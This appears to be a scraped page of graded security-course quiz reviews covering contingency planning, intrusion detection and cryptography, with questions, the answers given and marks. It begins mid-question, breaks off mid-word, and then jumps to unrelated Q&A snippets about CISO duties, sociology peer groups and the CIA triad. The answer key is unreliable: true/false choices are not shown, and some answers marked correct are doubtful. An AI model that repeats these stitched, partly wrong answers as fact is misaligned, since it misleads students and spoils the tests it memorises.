b. ECMA c. ticket d. PAC

Correct Marks for this submission: 2/2.

Question49Marks: 2

In ____________________ mode, the organization establishes two perimeter tunnel servers. Answer:tunel

Incorrect Correct answer: tunnel Marks for this submission: 0/2.

Question50Marks: 2

The application gateway is also known as a(n) ____. Choose one answer.a. application-level firewall

b. client firewall c. proxy firewall d. All of the above

Correct Marks for this submission: 2/2.

Chapter 5 Review Questions Review of attempt 1

Started on: Wednesday, June 15, 2011, 07:33 PM

Completed on: Saturday, June 18, 2011, 02:34 AM

Time taken: 2 days 7 hours

Grade: 90 out of a maximum of 100 (90%)

Question1Marks: 2

A(n) ____________________ site is a fully configured computer facility, with all services, communications links, and physical plant operations including heating and air conditioning. Answer:hot

Correct Marks for this submission: 2/2.

Question2Marks: 2

A standard is a plan or course of action that conveys instructions from an organization's senior management to those who make decisions, take actions, and perform other duties. Answer: True False

Correct Marks for this submission: 2/2.

Question3Marks: 2

A policy should state that if employees violate a company policy or any law using company technologies, the company will protect them, and the company is liable for the employees' actions. Answer: True False

Incorrect Marks for this submission: 0/2.

Question4Marks: 2

The first phase in the development of the contingency planning process is the ____. Choose one answer.a. BIA

b. BRP c. DP9 d. IRP

Incorrect Marks for this submission: 0/2.

Question5Marks: 2

A security ____ is an outline of the overall information security strategy for the organization and a roadmap for planned changes to the information security environment of the organization. Choose one answer.a. plan

b. framework c. mission d. blanket

Correct Marks for this submission: 2/2.

Question6Marks: 2

Implementing multiple types of technology and thereby precluding that the failure of one system will compromise the security of information is referred to as ____________________. Answer:redundancy

Correct Marks for this submission: 2/2.

Question7Marks: 2

Security ____ are the areas of trust within which users can freely communicate. Choose one answer.a. perimeters

b. domains c. rectangles d. layers

Correct Marks for this submission: 2/2.

Question8Marks: 2

A(n) ____________________ is a device that selectively discriminates against information flowing into or out of the organization. Answer:firewall

Correct Marks for this submission: 2/2.

Question9Marks: 2

An attack ____________________ is a detailed description of the activities that occur during an attack. Answer:profile

Correct Marks for this submission: 2/2.

Question10Marks: 2

A(n) capability table specifies which subjects and objects users or groups can access. Answer: True False

Correct Marks for this submission: 2/2.

Question11Marks: 2

A service bureau is an agency that provides a service for a fee. Answer: True False

Correct Marks for this submission: 2/2.

Question12Marks: 2

A buffer against outside attacks is frequently referred to as a(n) ____. Choose one answer.a. proxy server

b. no-man's land c. DMZ d. firewall

Correct Marks for this submission: 2/2.

Question13Marks: 2

The Security Area Working Group acts as an advisory board for the protocols and areas developed and promoted by the Internet Society and the ____. Choose one answer.a. IETF

b. ISO/IEC c. ISOC d. IRTF

Correct Marks for this submission: 2/2.

Question14Marks: 2

A firewall can be a single device or a firewall extranet, which consists of multiple firewalls creating a buffer between the outside and inside networks. Answer: True False

Correct Marks for this submission: 2/2.

Question15Marks: 2

Systems-specific security policies are formalized as written documents readily identifiable as policy. Answer: True False

Incorrect Marks for this submission: 0/2.

Question16Marks: 2

A(n) ____________________ plan ensures that critical business functions continue if a catastrophic incident or disaster occurs. Answer:disaster recovery

Incorrect Correct answer: business continuity Marks for this submission: 0/2.

Question17Marks: 2

The spheres of ____ are the foundation of the security framework and illustrate how information is under attack from a variety of sources. Choose one answer.a. defense

b. assessment c. security d. information

Correct Marks for this submission: 2/2.

Question18Marks: 2

Policies are living documents that must be managed. Answer: True False

Correct Marks for this submission: 2/2.

Question19Marks: 2

NIST documents can assist in the design of a security framework. Answer: True False

Correct Marks for this submission: 2/2.

Question20Marks: 2

RAID ____ drives can be hot swapped. Choose one answer.a. 2

b. 3 c. 4 d. 5

Correct Marks for this submission: 2/2.

Question21Marks: 2

Incident ____________________ is the process of examining a potential incident, or incident candidate, and determining whether or not the candidate constitutes an actual incident. Answer:classification

Correct Marks for this submission: 2/2.

Question22Marks: 2

A disaster recovery plan addresses the preparation for and recovery from a disaster, whether natural or man-made. Answer: True False

Correct Marks for this submission: 2/2.

Question23Marks: 2

Laws are more detailed statements of what must be done to comply with policy. Answer: True False

Correct Marks for this submission: 2/2.

Question24Marks: 2

An alert ____ is a document containing contact information for the people to be notified in the event of an incident. Choose one answer.a. message

b. roster c. plan d. list

Correct Marks for this submission: 2/2.

Question25Marks: 2

A cold site provides many of the same services and options of a hot site. Answer: True False

Correct Marks for this submission: 2/2.

Question26Marks: 2

A(n) ____ plan deals with the identification, classification, response, and recovery from an incident. Choose one answer.a. CM

b. BC c. DR d. IR

Correct Marks for this submission: 2/2.

Question27Marks: 2

Incident damage ____ is the rapid determination of the scope of the breach of the confidentiality, integrity, and availability of information and information assets during or just following an incident. Choose one answer.a. assessment

b. evaluation c. recovery d. plan

Correct Marks for this submission: 2/2.

Question28Marks: 2

Standards may be published, scrutinized, and ratified by a group, as in formal or ____ standards. Choose one answer.a. de formale

b. de public c. de jure d. de facto

Correct Marks for this submission: 2/2.

Question29Marks: 2

Strategic planning is the process of moving the organization towards its ____. Choose one answer.a. standard

b. policy c. mission d. vision

Correct Marks for this submission: 2/2.

Question30Marks: 2

A(n) ____________________ is any clearly identified attack on the organization's information assets that would threaten the assets' confidentiality, integrity, or availability. Answer:incident

Correct Marks for this submission: 2/2.

Question31Marks: 2

A(n) ____________________ backup is the storage of all files that have changed or been added since the last full backup. Answer:differential

Correct Marks for this submission: 2/2.

Question32Marks: 2

A(n) contingency plan is prepared by the organization to anticipate, react to, and recover from events that threaten the security of information and information assets in the organization, and, subsequently, to restore the organization to normal modes of business operations. Answer: True False

Correct Marks for this submission: 2/2.

Question33Marks: 2

Host-based IDPSs are usually installed on the machines they protect to monitor the status of various files stored on those machines. Answer: True False

Incorrect Marks for this submission: 0/2.

Question34Marks: 2

A(n) ____________________ message is a scripted description of an incident, usually just enough information so that each individual knows what portion of the IRP to implement, and not enough to slow down the notification process. Answer:alert

Correct Marks for this submission: 2/2.

Question35Marks: 2

A(n) ____________________ server performs actions on behalf of another system. Answer:proxy

Correct Marks for this submission: 2/2.

Question36Marks: 2

A(n) ____________________ is a contract between two or more organizations that specifies how each will assist the other in the event of a disaster. Answer:mutual agreement

Correct Marks for this submission: 2/2.

Question37Marks: 2

Effective management includes planning and ____. Choose one answer.a. organizing

b. leading c. controlling

d. All of the above

Correct Marks for this submission: 2/2.

Question38Marks: 2

A managerial guidance SysSP document is created by the IT experts in a company to guide management in the implementation and configuration of technology. Answer: True False

Correct Marks for this submission: 2/2.

Question39Marks: 2

Technical controls are the tactical and technical implementations of security in the organization. Answer: True False

Correct Marks for this submission: 2/2.

Question40Marks: 2

Incident ____________________ is the set of activities taken to plan for, detect, and correct the impact of an incident on information assets. Answer:response

Correct Marks for this submission: 2/2.

Question41Marks: 2

A ____ site provides only rudimentary services and facilities. Choose one answer.

a. cool

b. warm c. hot d. cold

Correct Marks for this submission: 2/2.

Question42Marks: 2

A(n) ____________________ is a detailed examination of the events that occurred from first detection to final recovery. Answer:after-action review

Correct Marks for this submission: 2/2.

Question43Marks: 2

A(n) ____________________ is a plan or course of action that conveys instructions from an organization's senior management to those who make decisions, take actions, and perform other duties. Answer:policy

Correct Marks for this submission: 2/2.

Question44Marks: 2

A security ____________________ defines the boundary between the outer limit of an organization's security and the beginning of the outside world. Answer:perimeter

Correct Marks for this submission: 2/2.

Question45Marks: 2

Redundancy can be implemented at a number of points throughout the security architecture, such as in ____. Choose one answer.a. firewalls

b. proxy servers c. access controls d. All of the above

Correct Marks for this submission: 2/2.

Question46Marks: 2

The SETA program is the responsibility of the ____ and is a control measure designed to reduce the incidences of accidental security breaches by employees. Choose one answer.a. CIO

b. CISCO c. CISO d. end users

Correct Marks for this submission: 2/2.

Question47Marks: 2

Evidence is the physical object or documented information that proves an action occurred or identifies the intent of a perpetrator. Answer: True False

Correct Marks for this submission: 2/2.

Question48Marks: 2

Computer ____________________ is the process of collecting, analyzing, and preserving computer-related evidence. Answer:forensics

Correct Marks for this submission: 2/2.

Question49Marks: 2

RAID Level 1 is commonly called disk ____________________. Answer:mirroring

Correct Marks for this submission: 2/2.

Question50Marks: 2

SP 800-14, Generally Accepted Principles and Practices for Securing Information Technology Systems, provides best practices and security principles that can direct the security team in the development of a security ____. Choose one answer.a. plan

b. standard c. policy d. blueprint

Correct Marks for this submission: 2/2.

Chapter 7 Review Questions Review of attempt 1

Marks: 2

A(n) ____________________ vulnerability scanner is one that initiates traffic on the network in order to determine security holes. Answer:active

Correct Marks for this submission: 2/2.

Question 2 Marks: 2

Activities that scan network locales for active systems and then identify the network services offered by the host systems is known as ____. Choose one answer. a. filtering b. doorknob rattling c. footprinting d. fingerprinting

Correct Marks for this submission: 2/2.

Question 3 Marks: 2

A(n) ____ is a proposed systems user. Choose one answer. a. authenticator b. challenger c. supplicant d. activator

Incorrect Marks for this submission: 0/2.

Question 4 Marks: 2

A(n) listener vulnerability scanner is one that listens in on the network and determines vulnerable versions of both server and client software. Answer: True False

Correct Marks for this submission: 2/2.

Question 5 Marks: 2

____ applications use a combination of techniques to detect an intrusion and then trace it back to its source. Choose one answer. a. Trace and treat b. Trap and trace c. Treat and trap d. Trace and clip

Correct Marks for this submission: 2/2.

Question 6 Marks: 2

____ are decoy systems designed to lure potential attackers away from critical systems. Choose one answer. a. Honeypots b. Honeycells c. Padded cells d. Padded nets

Correct Marks for this submission: 2/2.

Question 7 Marks: 2

A(n) ____________________ system contains pseudo-services that emulate well-known services, but is configured in ways that make it look vulnerable to attacks. Answer:honey pot

Incorrect Correct answer: honeypot Marks for this submission: 0/2.

Question 8 Marks: 2

Intrusion ____ activities finalize the restoration of operations to a normal state and seek to identify the source and method of the intrusion in order to ensure that the same type of attack cannot occur again. Choose one answer. a. prevention b. reaction c. detection d. correction

Incorrect Marks for this submission: 0/2.

Question 9 Marks: 2

Enticement is the action of luring an individual into committing a crime to get a conviction. Answer: True False

Correct Marks for this submission: 2/2.

Question 10 Marks: 2

A passive response is a definitive action automatically initiated when certain types of alerts are triggered. Answer: True False

Correct Marks for this submission: 2/2.

Question 11 Marks: 2

Which of the following ports is commonly used for the HTTP protocol? Choose one answer. a. 20 b. 25 c. 53 d. 80

Correct Marks for this submission: 2/2.

Question 12 Marks: 2

A sniffer cannot be used to eavesdrop on network traffic. Answer: True False

Correct Marks for this submission: 2/2.

Question 13 Marks: 2

A(n) ____________________ occurs when an attacker attempts to gain entry or disrupt the normal operations of an information system, almost always with the intent to do harm. Answer:intrusion

Correct Marks for this submission: 2/2.

Question 14 Marks: 2

A HIDPS can monitor systems logs for predefined events. Answer: True False

Correct Marks for this submission: 2/2.

Question 15 Marks: 2

The ongoing activity from alarm events that are accurate and noteworthy but not necessarily significant as potentially successful attacks is called ____________________. Answer:noise

Correct Marks for this submission: 2/2.

Question 16 Marks: 2

A(n) ____________________ IDPS can adapt its reactions in response to administrator guidance over time and circumstances of the current local environment. Answer:smart

Correct Marks for this submission: 2/2.

Question 17 Marks: 2

In TCP/IP networking, port ____ is not used. Choose one answer. a. 0 b. 1 c. 13 d. 1023

Correct Marks for this submission: 2/2.

Question 18 Marks: 2

A signature-based IDPS is sometimes called a(n) ____________________-based IDPS. Answer:knowledge

Correct Marks for this submission: 2/2.

Question 19 Marks: 2

IDPS researchers have used padded cell and honeypot systems since the late ____. Choose one answer. a. 1960s b. 1970s c. 1980s d. 1990s

Correct Marks for this submission: 2/2.

Question 20 Marks: 2

Alarm ____________________ and compaction is a consolidation of almost identical alarms that happen at close to the same time into a single higher-level alarm. Answer:clustering

Correct Marks for this submission: 2/2.

Question 21 Marks: 2

Using ____, the system reviews the log files generated by servers, network devices, and even other IDPSs. Choose one answer. a. LFM b. stat IDPS c. AppIDPS d. HIDPS

Correct Marks for this submission: 2/2.

Question 22 Marks: 2

A starting scanner is one that initiates traffic on the network in order to determine security holes. Answer: True False

Correct Marks for this submission: 2/2.

Question 23 Marks: 2

A(n) ____________________ is a honey pot that has been protected so that it cannot be easily compromised. Answer:padded cell

Correct Marks for this submission: 2/2.

Question 24 Marks: 2

The initial estimation of the defensive state of an organization's networks and systems is called doorknob ____________________. Answer:rattling

Correct Marks for this submission: 2/2.

Question 25 Marks: 2

In ____________________ protocol verification, the higher-order protocols are examined for unexpected packet behavior, or improper use. Answer:application

Correct Marks for this submission: 2/2.

Question 26 Marks: 2

Three methods dominate the IDPSs' detection methods: ____________________-based approach, statistical anomaly-based approach or the stateful packet inspection approach. Answer:signature

Correct Marks for this submission: 2/2.

Question 27 Marks: 2

A strategy based on the concept of defense in depth is likely to include intrusion detection systems, active vulnerability scanners, passive vulnerability scanners, automated log analyzers, and protocol analyzers. Answer: True False

Incorrect Marks for this submission: 0/2.

Question 28 Marks: 2

The attack ____________________ is a series of steps or processes used by an attacker, in a logical sequence, to launch an attack against a target system or network. Answer:protocol

Correct Marks for this submission: 2/2.

Question 29 Marks: 2

A HIDPS is optimized to detect multihost scanning, and it is able to detect the scanning of non-host network devices, such as routers or switches. Answer: True False

Incorrect Marks for this submission: 0/2.

Question 30 Marks: 2

Fingerprinting is the organized research of the Internet addresses owned or controlled by a target organization. Answer: True False

Incorrect Marks for this submission: 0/2.

Question 31 Marks: 2

A packet ____________________ is a network tool that collects copies of packets from the network and analyzes them. Answer:sniffer

Correct Marks for this submission: 2/2.

Question 32 Marks: 2

A(n) ____________________-based IDPS resides on a particular computer or server and monitors activity only on that system. Answer:host

Correct Marks for this submission: 2/2.

Question 33 Marks: 2

____ are usually passive devices and can be deployed into existing networks with little or no disruption to normal network operations. Choose one answer. a. NIDPSs b. HIDPSs c. AppIDPSs d. SIDPSs

Correct Marks for this submission: 2/2.

Question 34 Marks: 2

A(n) ____ works like a burglar alarm in that it detects a violation (some system activities analogous to an opened or broken window) and activates an alarm. Choose one answer. a. IDS b. IIS c. ITS d. SIS

Correct Marks for this submission: 2/2.

Question 35 Marks: 2

Among all possible biometrics, ____ is(are) considered truly unique. Choose one answer. a. retina of the eye b. fingerprints c. iris of the eye d. All of the above

Correct Marks for this submission: 2/2.

Question 36 Marks: 2

A false positive is the failure of an IDPS system to react to an actual attack event. Answer: True False

Correct Marks for this submission: 2/2.

Question 37 Marks: 2

Most NBA sensors can be deployed in ____ mode only, using the same connection methods as network-based IDPSs. Choose one answer. a. passive b. active c. reactive d. dynamic

Correct Marks for this submission: 2/2.

Question 38 Marks: 2

A(n) ____ is a network tool that collects copies of packets from the network and analyzes them. Choose one answer. a. packet scanner b. packet sniffer c. honey pot d. honey packet

Correct Marks for this submission: 2/2.

Question 39 Marks: 2

HIDPSs are also known as system ____________________ verifiers. Answer:integrity

Correct Marks for this submission: 2/2.

Question 40 Marks: 2

A wireless security toolkit should include the ability to sniff wireless traffic, scan wireless hosts, and assess the level of privacy or confidentiality afforded on the wireless network. Answer: True False

Correct Marks for this submission: 2/2.

Question 41 Marks: 2

The ____________________ error rate is the level at which the number of false rejections equals the false acceptances, also known as the equal error rate. Answer:crossover

Correct Marks for this submission: 2/2.

Question 42 Marks: 2

The ____________________ port is also known as a switched port analysis port or mirror port. Answer:monitoring

Correct Marks for this submission: 2/2.

Question 43 Marks: 2

A(n) NIDPS functions on the host system, where encrypted traffic will have been decrypted and is available for processing. Answer: True False

Incorrect Marks for this submission: 0/2.

Question 44 Marks: 2

Minutiae are unique points of reference that are digitized and stored in an encrypted format when the user's system access credentials are created. Answer: True False

Correct Marks for this submission: 2/2.

Question 45 Marks: 2

A fully distributed IDPS control strategy is the opposite of the centralized strategy. Answer: True False

Correct Marks for this submission: 2/2.

Question 46 Marks: 2

A(n) ____ IDPS is focused on protecting network information assets. Choose one answer. a. network-based b. host-based c. application-based d. server-based

Correct Marks for this submission: 2/2.

Question 47 Marks: 2

A(n) log file monitor is similar to a NIDPS. Answer: True False

Correct Marks for this submission: 2/2.

Question 48 Marks: 2

To determine whether an attack has occurred or is underway, NIDPSs compare measured activity to known ____ in their knowledge base. Choose one answer. a. fingernails b. fingerprints c. signatures d. footprints

Correct Marks for this submission: 2/2.

Question 49 Marks: 2

A padded cell is a hardened honeynet. Answer: True False

Correct Marks for this submission: 2/2.

Question 50 Marks: 2

____ benchmark and monitor the status of key system files and detect when an intruder creates, modifies, or deletes monitored files. Choose one answer. a. NIDPSs b. HIDPSs c. AppIDPSs

Question1Marks: 2

____ are encrypted messages that can be mathematically proven to be authentic. Choose one answer.a. Digital signatures

b. MAC c. Message certificates d. Message digests

Correct Marks for this submission: 2/2.

Question2Marks: 2

A(n) distinguished name uniquely identifies a certificate entity, to a user's public key. Answer: True False

Incorrect Marks for this submission: 0/2.

Question3Marks: 2

Privacy Enhanced Mail was proposed by the Internet Engineering Task Force and is a standard that uses 3DES symmetric key encryption and RSA for key exchanges and digital signatures. Answer: True False

Correct Marks for this submission: 2/2.

Question4Marks: 2

As DES became known as being too weak for highly classified communications, Double DES was created to provide a level of security far beyond that of DES. Answer: True False

Correct Marks for this submission: 2/2.

Question5Marks: 2

A(n) ____________________ substitution uses one alphabet. Answer:monoalphabetic

Correct Marks for this submission: 2/2.

Question6Marks: 2

An attacker may obtain duplicate texts, one in ciphertext and one in plaintext, and thus reverse-engineer the encryption algorithm in a known-plaintext attack scheme. Answer: True False

Correct Marks for this submission: 2/2.

Question7Marks: 2

In IPSEC ____________________ mode, only the IP data is encrypted, not the IP headers. Answer:transport

Correct Marks for this submission: 2/2.

Question8Marks: 2

Digital ____________________ are public-key container files that allow computer programs to validate the key and identify to whom it belongs. Answer:certificates

Correct Marks for this submission: 2/2.

Question9Marks: 2

Digital ____________________ are encrypted messages that can be mathematically proven to be authentic. Answer:signatures

Correct Marks for this submission: 2/2.

Question10Marks: 2

A message ____________________ is a fingerprint of the author's message that is compared with the recipient's locally calculated hash of the same message. Answer:digest

Correct Marks for this submission: 2/2.

Question11Marks: 2

Digital signatures should be created using processes and products that are based on the ____.

Choose one answer.a. DSS

b. NIST c. SSL d. HTTPS

Incorrect Marks for this submission: 0/2.

Question12Marks: 2

DES uses a(n) _____-bit block size. Choose one answer.a. 32

b. 64 c. 128 d. 256

Correct Marks for this submission: 2/2.

Question13Marks: 2

Symmetric encryption uses two different but related keys, and either key can be used to encrypt or decrypt the message. Answer: True False

Correct Marks for this submission: 2/2.

Question14Marks: 2

____ attacks are a collection of brute-force methods that attempt to deduce statistical relationships between the structure of the unknown key and the ciphertext that is the output of the cryptosystem. Choose one answer.a. Timing

b. Dictionary c. Correlation d. Man-in-the-middle

Correct Marks for this submission: 2/2.

Question15Marks: 2

A(n) ____________________ authority operates under the trusted collaboration of the certificate authority and can be delegated day-to-day certification functions, such as verifying registration information about new registrants, generating end-user keys, revoking certificates, and validating that users possess a valid certificate. Answer:registration

Correct Marks for this submission: 2/2.

Question16Marks: 2

The science of encryption is known as ____________________. Answer:cryptology

Correct Marks for this submission: 2/2.

Question17Marks: 2

A ____ is a key-dependent, one-way hash function that allows only specific recipients (symmetric key holders) to access the message digest. Choose one answer.

a. signature

b. MAC c. fingerprint d. digest

Correct Marks for this submission: 2/2.

Question18Marks: 2

Common implementations of RA include systems that issue digital certificates to users and servers; directory enrollment; key issuing systems; tools for managing the key issuance; and verification and return of certificates. Answer: True False

Correct Marks for this submission: 2/2.

Question19Marks: 2

The CA periodically distributes a(n) ____ to all users that identifies all revoked certificates. Choose one answer.a. CRL

b. RA c. MAC d. AES

Correct Marks for this submission: 2/2.

Question20Marks: 2

Attackers may conduct an encrypted-plaintext attack by sending potential victims a specific text that they are sure the victims will forward on to others. Answer: True False

Correct Marks for this submission: 2/2.

Question21Marks: 2

The ____ algorithm was the first public key encryption algorithm developed (in 1977) and published for commercial use. Choose one answer.a. DES

b. RSA c. MAC d. AES

Correct Marks for this submission: 2/2.

Question22Marks: 2

A mathematical ____________________ is a secret mechanism that enables you to easily accomplish the reverse function in a one-way function. Answer:trapdoor

Correct Marks for this submission: 2/2.

Question23Marks: 2

In a ____ attack, the attacker eavesdrops during the victim's session and uses statistical analysis of patterns and inter-keystroke timings to discern sensitive session information. Choose one answer.

a. replay

b. timing c. correlation d. dictionary

Correct Marks for this submission: 2/2.

Question24Marks: 2

In a(n) ____________________ attack, the attacker eavesdrops on the victim's session and uses statistical analysis of patterns and inter-keystroke timings to discern sensitive session information. Answer:timing

Correct Marks for this submission: 2/2.

Question25Marks: 2

A(n) key is the programmatic steps used to convert an unencrypted message into an encrypted sequence of bits that represent the message. Answer: True False

Correct Marks for this submission: 2/2.

Question26Marks: 2

Hash algorithms are public functions that create a hash value by converting variable-length messages int

What is the chief information security officer primarily responsible for quizlet?

The Chief Information Security Officer (CISO) is primarily responsible for the assessment, management, and implementation of information security in the organization.

What functions does the CISO perform quizlet?

The CISO exercises overall responsibility for the organization's information technology security-related programs, such as risk management, policy development and compliance monitoring, security awareness, incident investigation and reporting, and often contingency planning.

Is a group of individuals who are united by similar interests or values?

In sociology, a peer group is both a social group and a primary group of people who have similar interests (homophily), age, background, or social status. The members of this group are likely to influence the person's beliefs and behaviour.

When information is whole complete and uncorrupted?

What are the three components of the C.I.A. triangle? Confidentiality, Integrity, Availability. In Information Security, accuracy is the quality or state of being genuine or original. In Information Security, Integrity is when information is whole, complete, and uncorrupted.